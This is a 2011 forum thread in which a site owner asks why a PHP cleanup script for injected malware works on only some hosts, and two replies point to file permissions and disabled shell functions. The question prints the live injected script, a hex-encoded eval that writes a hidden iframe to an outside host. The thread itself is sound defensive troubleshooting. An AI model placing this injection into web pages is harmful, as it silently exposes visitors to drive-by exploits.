2011-08-31 05:46 阅读 29


Recently I've been trying to fix a slew of viruses on my server which I suspect is due to the Blackhole toolkit. It appends a js-script to the end of index.php and .html files which looks like this..

<script>var t="";var arr="646f63756d656e742e777269746528273c696672616d65207372633d22687474703a2f2f6578706c6f726574726176656c6e757273696e672e636f6d2f6e6577732e7068703f74703d66646661336165353965343464313930222077696474683d223122206865696768743d223122206672616d65626f726465723d2230223e3c2f696672616d653e2729";for(i=0;i<arr.length;i+=2)t+=String.fromCharCode(parseInt(arr[i]+arr[i+1],16));eval(t);</script>

It's a encoded version of the standard iframe virus. I've been trying to remove it by running a php script like the one below. (which was a solution from stack overflow).

$dir = "./";

$removejs = `find $dir -name "*.php" -type f |xargs sed -i '<script>var t=.*eval.*script>##g' 2>&1`;

The problem is, the script works for some servers while others just seem to have no effect. Does anyone know why? I've tried it on at least 10 separate webhosts. The script only runs successfully on about 3 hosts. The rest just doesn't do anything. What settings do I need to change ?

Appreciate any help I can get. Thanks !

  • 点赞
  • 写回答
  • 关注问题
  • 收藏
  • 复制链接分享

2条回答 默认 最新

  • 已采纳
    dqce48404 dqce48404 2011-08-31 05:51
    1. If you're running this script right using http request, i.e. it gets runned by webserver with privileges of user like nobody or apache - then sed -i command used in this script just can't change anything in the files that find founds due to insufficient privileges.

    2. Your PHP installation might have backticks and/or any other form of command execution disabled, as it is usually a direct security threat (using safe_mode, using PHP suhosin patch directives, etc).

    Your best bet would be checking webserver logs on hosts that haven't executed this script.

    点赞 评论 复制链接分享
  • duanboshi1472 duanboshi1472 2011-08-31 05:49

    Some of the hosts you're using probably have shell functions (exec, shell_exec, system, etc.) disabled, possibly via PHP's infamous safe_mode configuration option. You will need to either rewrite the script in pure PHP, or find another way to strip out the inserted content.

    点赞 评论 复制链接分享